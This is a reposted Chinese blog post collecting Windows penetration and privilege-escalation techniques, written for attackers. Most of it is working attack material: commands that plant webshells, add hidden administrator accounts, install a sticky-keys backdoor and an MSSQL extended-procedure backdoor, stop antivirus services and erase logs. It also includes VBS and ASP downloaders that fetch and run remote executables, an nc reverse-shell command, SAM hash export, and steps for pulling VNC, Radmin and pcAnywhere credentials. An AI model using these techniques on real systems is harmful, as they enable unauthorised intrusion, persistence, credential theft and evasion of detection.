昔日

Windows渗透与提权技巧汇总

GrayTensor 's Blog

Windows渗透与提权技巧汇总

 

本文汇总了Windows渗透与提权的多个技巧,包含:MSSQL查询分析器连接记录清除、VNC与Radmin的提权方法、Cmd 下目录的操作技巧以及Webshell 提权小技巧等。

 

旁站路径问题:

 

1、读网站配置。

 

2、用以下VBS:

 

On Error Resume Next

If (LCase(Right(WScript.Fullname, 11)) ="wscript.exe") Then

MsgBox Space(12) & "IIS Virtual WebViewer" & Space(12) & Chr(13) & Space(9) & "Usage:Cscript vWeb.vbs", 4096, "Lilo" 

WScript.Quit

End If

Set objservice =GetObject("IIS://LocalHost/W3SVC") 

For Each obj3w In objservice

If IsNumeric(obj3w.Name) Then

Set OService = GetObject("IIS://LocalHost/W3SVC/"& obj3w.Name) 

Set VDirObj =OService.GetObject("IIsWebVirtualDir", "ROOT") 

If Err <> 0 Then WScript.Quit (1) 

WScript.Echo Chr(10) & "["& OService.ServerComment & "]" 

For Each Binds In OService.ServerBindings

Web = "{ " & Replace(Binds,":", " } { ") & " }" 

WScript.Echo Replace(Split(Replace(Web," ", ""), "}{")(2), "}", "") 

Next

WScript.Echo "Path            : " & VDirObj.Path

End If

Next

3、iis_spy 列举(注:需要支持ASPX,反IISSPY的方法:将 activeds.dll,activeds.tlb 降权)。

 

4、得到目标站目录,不能直接跨的。可以通过“echo ^<%execute(request(“cmd”))%^>>>X:\目标目录\X.asp”或者“copy 脚本文件 X:\目标目录\X.asp”像目标目录写入webshell,或者还可以试试type命令。

 

网站可能目录(注:一般是虚拟主机类):

 

data/htdocs.网站/网站/

CMD 下操作 VPN 相关知识、资料:

 

#允许administrator拨入该VPN:

 

netsh ras set user administrator permit

#禁止administrator拨入该VPN:

 

netsh ras set user administrator deny

#查看哪些用户可以拨入VPN:

 

netsh ras show user

#查看VPN分配IP的方式:

 

netsh ras ip show config

#使用地址池的方式分配IP:

 

netsh ras ip set addrassign method = pool

#地址池的范围是从192.168.3.1到192.168.3.254:

 

netsh ras ip add range from = 192.168.3.1to = 192.168.3.254

Cmd、Dos 命令行下添加 SQL 用户的方法:

 

需要有管理员权限,在命令下先建立一个“c:\test.qry”文件,内容如下:

 

exec master.dbo.sp_addlogin test,123

EXEC sp_addsrvrolemember 'test, 'sysadmin'

然后在DOS下执行:cmd.exe /c isql -E /U alma /P /ic:\test.qry

 

另类的加用户方法:

 

在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下:

 

js:

 

var o=new ActiveXObject("Shell.Users" ); 

z=o.create("test") ; 

z.changePassword("123456","")

z.setting("AccountType")=3; 

vbs: 

view source

Set o=CreateObject( "Shell.Users") 

Set z=o.create("test") 

z.changePassword "123456",""

z.setting("AccountType")=3

Cmd 访问控制权限控制:

 

命令如下:

 

cacls c: /e /t /g everyone:F           #c盘everyone权限

cacls "目录" /d everyone              #everyone不可读,包括admin 

备注:

 

反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具–文件夹选项–使用简单的共享去掉即可。

 

3389 相关,以下配合PR更好:

 

a、防火墙TCP/IP筛选.(关闭:net stop policyagent & netstop sharedaccess)

 

b、内网环境(lcx.exe)

 

c、终端服务器超出了最大允许连接(XP 运行:mstsc/admin;2003 运行:mstsc/console)

 

1.查询终端端口:

 

REG queryHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server\WinStations\RDP-Tcp /v PortNumber

2.开启XP&2003终端服务:

 

REG ADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /vfDenyTSConnections /t REG_DWORD /d 00000000 /f

3.更改终端端口为2008(十六进制为:0x7d8):

 

REG ADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f

REG ADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f

4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制:

 

REG ADDHKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List/v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled :@ xpsp2res.dll,-22009 /f

create table a (cmd text); 

insert into a values ("setwshshell=createobject (""wscript.shell"")"); 

insert into a values ("a=wshshell.run(""cmd.exe /c net user admin admin /add"",0)"); 

insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup administrators admin/add"",0)"); 

select * from a into outfile"C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; 

BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。(注:一直忽略了在偏僻角落的那个功能)

 

关闭常见杀软(把杀软所在的文件的所有权限去掉):

 

处理变态诺顿企业版:

 

net stop "Symantec AntiVirus" /y

net stop "Symantec AntiVirusDefinition Watcher" /y

net stop "Symantec Event Manager"/y

net stop "System Event Notification"/y

net stop "Symantec SettingsManager" /y

麦咖啡:

 

net stop "McAfee McShield" 

Symantec病毒日志:

 

C:\Documents and Settings\AllUsers\Application Data\Symantec\Symantec Endpoint Protection\Logs

Symantec病毒备份:

 

C:\Documents and Settings\AllUsers\Application Data\Symantec\Symantec Endpoint Protection\Quarantine

Nod32病毒备份:

 

C:\Docume~1\Administrator\LocalSettings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine

Nod32移除密码保护:

 

删除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESETSecurity\CurrentVersion\Info\PackageID”即可

安装5次shift后门,沾滞键后门,替换SHIFT后门:

 

5次SHIFT,沾滞键后门:

 

copy %systemroot%\system32\sethc.exe%systemroot%\system32\dllcache\sethc1.exe 

copy %systemroot%\system32\cmd.exe%systemroot%\system32\dllcache\sethc.exe /y 

copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe/y 

替换SHIFT后门:

 

attrib c:\windows\system32\sethc.exe -h -r-s 

attribc:\windows\system32\dllcache\sethc.exe -h -r -s 

del c:\windows\system32\sethc.exe

copy c:\windows\explorer.exec:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exec:\windows\system32\dllcache\sethc.exe

attrib c:\windows\system32\sethc.exe +h +r+s 

attribc:\windows\system32\dllcache\sethc.exe +h +r +s 

添加隐藏系统账号:

 

1、执行命令:“net user admin$ 123456 /add&net localgroup administrators admin$/add”。

 

2、导出注册表SAM下用户的两个键值。

 

3、在用户管理界面里的 admin$ 删除,然后把备份的注册表导回去。

 

4、利用 Hacker Defender 把相关用户注册表隐藏。

 

安装 MSSQL 扩展后门:

 

USE master; 

EXEC sp_addextendedproc 'xp_helpsystem','xp_helpsystem.dll'; 

GRANT exec On xp_helpsystem TO public; 

处理服务器MSFTP日志:

 

在“C:\WINNT\system32\LogFiles\MSFTPSVC1\”下有 ex011120.log / ex011121.log /ex011124.log 三个文件,直接删除ex0111124.log 不成功,显示“原文件…正在使用”。

 

当然可以直接删除“ex011120.log/ ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。

 

当停止“msftpsvc”服务后可直接删除“ex011124.log”。

 

MSSQL查询分析器连接记录清除:

 

MSSQL 2000 位于注册表如下:

 

HKEY_CURRENT_USER\Software\Microsoft\MicrosoftSQL Server\80\Tools\Client\PrefServers

找到接接过的信息删除。

 

MSSQL 2005 是在:

 

C:\Documents and Settings\\ApplicationData\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat

防BT系统拦截技巧,可以使用远程下载shell:

 

<% 

SubeWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl) 

Dim Ads, Retrieval, GetRemoteData

On Error Resume Next

Set Retrieval =Server.CreateObject("Microsoft.XMLHTTP") 

With Retrieval

.Open "Get", s_RemoteFileUrl,False, "", "" 

.Send

GetRemoteData = .ResponseBody 

End With

Set Retrieval = Nothing

Set Ads =Server.CreateObject("Adodb.Stream") 

With Ads

.Type = 1

.Open

.Write GetRemoteData

.SaveToFileServer.MapPath(s_LocalFileName), 2

.Cancel() 

.Close() 

End With

Set Ads = Nothing

End Sub

eWebEditor_SaveRemoteFile "yourshell's name", "your shell'urL" 

%> 

防BT系统拦截技巧,可以使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,用服务器安全工具一扫通通挂掉了。

 

VNC、Radmin、PcAnywhere 的提权方法:

 

首先利用 shell 读取 vnc 保存在注册表中的密文,然后再使用工具VNC4X破解。

 

注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password

 

Radmin 默认端口是4899,先获取密码和端口,如下位置:

 

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port//默认端口注册表位置

然后用HASH版连接。

 

如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有 PcAnywhere 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过 PcAnywhere 从本机登陆服务器。

 

保存密码的CIF文件,不是位于PcAnywhere的安装目录,而且位于安装PcAnywhere所安装盘的:

 

“\Documentsand Settings\All Users\Application Data\Symantec\pcAnywhere\”

如果PcAnywhere安装在“D:\program\”文件夹下,那么PcAnywhere的密码文件就保存在:“D:\Documents andSettings\All Users\Application Data\Symantec\pcAnywhere\”文件夹下。

 

WinWebMail 提权加用户:

 

WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式,接下来,看路径,访问“路径\web”传 shell,访问shell后,权限是system,直接放远控进启动项,等待下次重启。

 

没有删cmd组件的可以直接加用户,7i24的web目录也是可写,权限为administrator。

 

1433 SA权限构建注入点:

 

<% 

strSQLServerName = "服务器ip" 

strSQLDBUserName = "数据库帐号" 

strSQLDBPassword = "数据库密码" 

strSQLDBName = "数据库名称" 

Set conn =server.CreateObject("ADODB.Connection") 

strCon = "Provider=SQLOLEDB.1;PersistSecurity Info=False;Server=" & strSQLServerName & ";UserID=" & strSQLDBUserName & ";Password=" &strSQLDBPassword & ";Database=" & strSQLDBName &";" 

conn.open strCon

Dim rs, strSQL, id

Set rs =server.CreateObject("ADODB.recordset") 

id = request("id") 

strSQL = "select * from ACTLIST whereworldid=" & idrs.open strSQL,conn,1,3

rs.Close

%> 

提权篇:

 

先执行systeminfo

 

token 漏洞补丁号 KB956572

 

Churrasco kb952004

 

命令行RAR打包~~·

 

1rar a -k -r -s -m3 c:\1.rar c:\folder

 

收集系统信息的脚本:

 

for window:

@echo off

echo #########system info collection  

systeminfo

ver

hostname

net user

net localgroup

net localgroup administrators

net user guest

net user administrator

echo #######at- with   atq##### 

echo schtask /query 

echo

echo ####task-list############# 

tasklist /svc 

echo

echo ####net-work infomation

ipconfig/all

route print

arp -a 

netstat -anipconfig /displaydns 

echo

echo #######service############ 

sc query type= service state= all

echo #######file-############## 

cd \ 

tree -F 

gethash 不免杀怎么获取本机 hash:

 

首先导出注册表:

 

Windows 2000:regedit /e d:\aa.reg"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"

Windows 2003:reg export"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg

注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)。

 

接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了

 

hash 抓完了记得把自己的账户密码改过来哦!

 

当 GetHashes 获取不到 hash 时,可以用冰刃把 sam 复制到桌面。据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~

 

vbs 下载者:

 

1:

 

echo Set sGet =createObject("ADODB.Stream") >>c:\windows\cftmon.vbs 

echo sGet.Mode = 3>>c:\windows\cftmon.vbs

echo sGet.Type = 1>>c:\windows\cftmon.vbs

echo sGet.Open()>>c:\windows\cftmon.vbs

echo sGet.Write(xPost.responseBody)>>c:\windows\cftmon.vbs

echo sGet.SaveToFile"c:\windows\e.exe",2 >>c:\windows\cftmon.vbs 

echo Set objShell =CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs 

echo objshell.run"""c:\windows\e.exe""">>c:\windows\cftmon.vbs

cftmon.vbs

2:

 

On Error Resume Next:DimiRemote,iLocal,s1,s2

iLocal =LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0)) 

s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"

Set xPost = CreateObject(s1):xPost.Open"GET",iRemote,0:xPost.Send() 

Set sGet =CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open() 

sGet.Write(xPost.responseBody):sGet.SaveToFileiLocal,2

cscript c:\down.vbs http://xxxx/mm.exec:\mm.exe

create table a (cmd text):

view source

insert into a values ("setwshshell=createobject (""wscript.shell"")"); 

insert into a values ("a=wshshell.run(""cmd.exe /c net user admin admin /add"",0)"); 

insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup administrators admin/add"",0)"); 

select * from a into outfile"C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs"; 

Cmd 下目录的操作技巧:

 

列出d的所有目录:

 

for /d %i in (d:\freehost\*) do @echo %i

把当前路径下文件夹的名字只有1-3个字母的显示出来:

 

for /d %i in (???) do @echo %i

以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:

 

for /r %i in (*.exe) do @echo %i

以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:

 

for /r"f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i

这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中:

 

for /f %i in (c:\1.txt) do echo %i

delims=后的空格是分隔符,tokens是取第几个位置:

 

for /f "tokens=2 delims= " %i in(a.txt) do echo %i

Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):

 

c:\windows\php.ini

c:\boot.ini

c:\1.txt

c:\a.txt

c:\CMailServer\config.ini

c:\CMailServer\CMailServer.exe

c:\CMailServer\WebMail\index.asp

c:\programfiles\CMailServer\CMailServer.exe

c:\programfiles\CMailServer\WebMail\index.asp

C:\WinWebMail\SysInfo.ini

C:\WinWebMail\Web\default.asp

C:\WINDOWS\FreeHost32.dll

C:\WINDOWS\7i24iislog4.exe

C:\WINDOWS\7i24tool.exe

c:\hzhost\databases\url.asp

c:\hzhost\hzclient.exe

C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk

C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk

C:\WINDOWS\web.config

c:\web\index.html

c:\www\index.html

c:\WWWROOT\index.html

c:\website\index.html

c:\web\index.asp

c:\www\index.asp

c:\wwwsite\index.asp

c:\WWWROOT\index.asp

c:\web\index.php

c:\www\index.php

c:\WWWROOT\index.php

c:\WWWsite\index.php

c:\web\default.html

c:\www\default.html

c:\WWWROOT\default.html

c:\website\default.html

c:\web\default.asp

c:\www\default.asp

c:\wwwsite\default.asp

c:\WWWROOT\default.asp

c:\web\default.php

c:\www\default.php

c:\WWWROOT\default.php

c:\WWWsite\default.php

C:\Inetpub\wwwroot\pagerror.gif

c:\windows\notepad.exe

c:\winnt\notepad.exe

C:\Program Files\MicrosoftOffice\OFFICE10\winword.exe

C:\Program Files\MicrosoftOffice\OFFICE11\winword.exe

C:\Program Files\MicrosoftOffice\OFFICE12\winword.exe

C:\Program Files\Internet Explorer\IEXPLORE.EXE

C:\Program Files\winrar\rar.exe

C:\Program Files\360\360Safe\360safe.exe

C:\Program Files\360Safe\360safe.exe

C:\Documents andSettings\Administrator\Application Data\360Safe\360Examine\360Examine.log

c:\ravbin\store.ini

c:\rising.ini

C:\Program Files\Rising\Rav\RsTask.xml

C:\Documents and Settings\All Users\StartMenu\desktop.ini

C:\Documents and Settings\Administrator\MyDocuments\Default.rdp

C:\Documents andSettings\Administrator\Cookies\index.dat

C:\Documents and Settings\Administrator\MyDocuments\新建文本文档.txt

C:\Documents and Settings\Administrator\桌面\新建文本文档.txt

C:\Documents and Settings\Administrator\MyDocuments\1.txt

C:\Documents and Settings\Administrator\桌面\1.txt

C:\Documents and Settings\Administrator\MyDocuments\a.txt

C:\Documents and Settings\Administrator\桌面\a.txt

C:\Documents and Settings\AllUsers\Documents\My Pictures\Sample Pictures\Blue hills.jpg

E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm

C:\ProgramFiles\RhinoSoft.com\Serv-U\Version.txt

C:\ProgramFiles\RhinoSoft.com\Serv-U\ServUDaemon.ini

C:\Program Files\Symantec\SYMEVENT.INF

C:\Program Files\Microsoft SQLServer\80\Tools\Binn\sqlmangr.exe

C:\Program Files\Microsoft SQLServer\MSSQL\Data\master.mdf

C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf

C:\Program Files\Microsoft SQLServer\MSSQL.2\MSSQL\Data\master.mdf

C:\Program Files\Microsoft SQLServer\80\Tools\HTML\database.htm

C:\Program Files\Microsoft SQLServer\MSSQL\README.TXT

C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll

C:\Program Files\Microsoft SQLServer\MSSQL\sqlsunin.ini

C:\MySQL\MySQL Server 5.0\my.ini

C:\Program Files\MySQL\MySQL Server5.0\my.ini

C:\Program Files\MySQL\MySQL Server5.0\data\mysql\user.frm

C:\Program Files\MySQL\MySQL Server 5.0\COPYING

C:\Program Files\MySQL\MySQL Server5.0\share\mysql_fix_privilege_tables.sql

C:\Program Files\MySQL\MySQL Server4.1\bin\mysql.exe

c:\MySQL\MySQL Server 4.1\bin\mysql.exe

c:\MySQL\MySQL Server4.1\data\mysql\user.frm

C:\Program Files\Oracle\oraconfig\Lpk.dll

C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe

C:\WINDOWS\system32\inetsrv\w3wp.exe

C:\WINDOWS\system32\inetsrv\inetinfo.exe

C:\WINDOWS\system32\inetsrv\MetaBase.xml

C:\WINDOWS\system32\inetsrv\iisa,dmpwd\achg.asp

C:\WINDOWS\system32\config\default.LOG

C:\WINDOWS\system32\config\sam

C:\WINDOWS\system32\config\system

c:\CMailServer\config.ini

c:\program files\CMailServer\config.ini

c:\tomcat6\tomcat6\bin\version.sh

c:\tomcat6\bin\version.sh

c:\tomcat\bin\version.sh

c:\program files\tomcat6\bin\version.sh

C:\Program Files\Apache SoftwareFoundation\Tomcat 6.0\bin\version.sh

c:\Program Files\Apache SoftwareFoundation\Tomcat 6.0\logs\isapi_redirect.log

c:\Apache2\Apache2\bin\Apache.exe

c:\Apache2\bin\Apache.exe

c:\Apache2\php\license.txt

C:\Program Files\ApacheGroup\Apache2\bin\Apache.exe

c:\Program Files\QQ2007\qq.exe

c:\Program Files\Tencent\, qq\User.db

c:\Program Files\Tencent\qq\qq.exe

c:\Program Files\Tencent\qq\bin\qq.exe

c:\Program Files\Tencent\qq2009\qq.exe

c:\Program Files\Tencent\qq2008\qq.exe

c:\Program Files\Tencent\qq2010\bin\qq.exe

c:\Program Files\Tencent\qq\Users\AllUsers\Registry.db

C:\ProgramFiles\Tencent\TM\TMDlls\QQZip.dll

c:\ProgramFiles\Tencent\Tm\Bin\Txplatform.exe

c:\Program Files\Tencent\RTXServer\AppConfig.xml

C:\Program Files\Foxmal\Foxmail.exe

C:\Program Files\Foxmal\accounts.cfg

C:\Program Files\tencent\Foxmal\Foxmail.exe

C:\ProgramFiles\tencent\Foxmal\accounts.cfg

C:\Program Files\LeapFTP 3.0\LeapFTP.exe

C:\Program Files\LeapFTP\LeapFTP.exe

c:\Program Files\GlobalSCAPE\CuteFTPPro\cftppro.exe

c:\Program Files\GlobalSCAPE\CuteFTPPro\notes.txt

C:\Program Files\FlashFXP\FlashFXP.ini

C:\Program Files\FlashFXP\flashfxp.exe

c:\Program Files\Oracle\bin\regsvr32.exe

c:\Program Files\腾讯游戏\QQGAME\readme.txt

c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt

c:\Program Files\tencent\QQGAME\readme.txt

C:\Program Files\StormII\Storm.exe

各种网站的配置文件相对路径大全:

 

/config.php

../../config.php

../config.php

../../../config.php

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/conn.php

./conn.php

../../conn.php

../conn.php

../../../conn.php

/conn.asp

./conn.asp

../../conn.asp

../conn.asp

../../../conn.asp

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/config/config.php

../../config/config.php

../config/config.php

../../../config/config.php

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/config/conn.php

./config/conn.php

../../config/conn.php

../config/conn.php

../../../config/conn.php

/config/conn.asp

./config/conn.asp

../../config/conn.asp

../config/conn.asp

../../../config/conn.asp

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/data/config.php

../../data/config.php

../data/config.php

../../../data/config.php

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/data/conn.php

./data/conn.php

../../data/conn.php

../data/conn.php

../../../data/conn.php

/data/conn.asp

./data/conn.asp

../../data/conn.asp

../data/conn.asp

../../../data/conn.asp

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/include/config.php

../../include/config.php

../include/config.php

../../../include/config.php

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/include/conn.php

./include/conn.php

../../include/conn.php

../include/conn.php

../../../include/conn.php

/include/conn.asp

./include/conn.asp

../../include/conn.asp

../include/conn.asp

../../../include/conn.asp

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/inc/config.php

../../inc/config.php

../inc/config.php

../../../inc/config.php

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/inc/conn.php

./inc/conn.php

../../inc/conn.php

../inc/conn.php

../../../inc/conn.php

/inc/conn.asp

./inc/conn.asp

../../inc/conn.asp

../inc/conn.asp

../../../inc/conn.asp

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/index.php

./index.php

../../index.php

../index.php

../../../index.php

/index.asp

./index.asp

../../index.asp

../index.asp

../../../index.asp

去除TCP IP筛选:

 

TCP/IP筛选在注册表里有三处,分别是:

 

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分别用以下命令来导出注册表项:

 

regedit -e D:\a.regHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

regedit -e D:\b.regHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip

regedit -e D:\c.regHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

然后再把三个文件里的:

 

“EnableSecurityFilters"=dword:00000001”

改为:

 

“EnableSecurityFilters"=dword:00000000”

再将以上三个文件分别用以下命令导入注册表即可:

 

regedit -s D:\a.reg

regedit -s D:\b.reg

regedit -s D:\c.reg

Webshell 提权小技巧:

 

Cmd路径:

 

c:\windows\temp\cmd.exe

Nc 也在同目录下,例如反弹cmdshell:

 

"c:\windows\temp\nc.exe -vv ip 999 -ec:\windows\temp\cmd.exe"

通常都不会成功。

 

而直接在 cmd 路径上输入:

 

c:\windows\temp\nc.exe

命令输入:

 

-vv ip 999 -e c:\windows\temp\cmd.exe

却能成功。。这个不是重点

 

我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。

 

命令行调用 RAR 打包:

 

rar a -k -r -s -m3 c:\1.rar c:\folde


评论

热度(1)

  1. 昔日GrayTensor 's Blog 转载了此文字
    GrayTensor 's Blog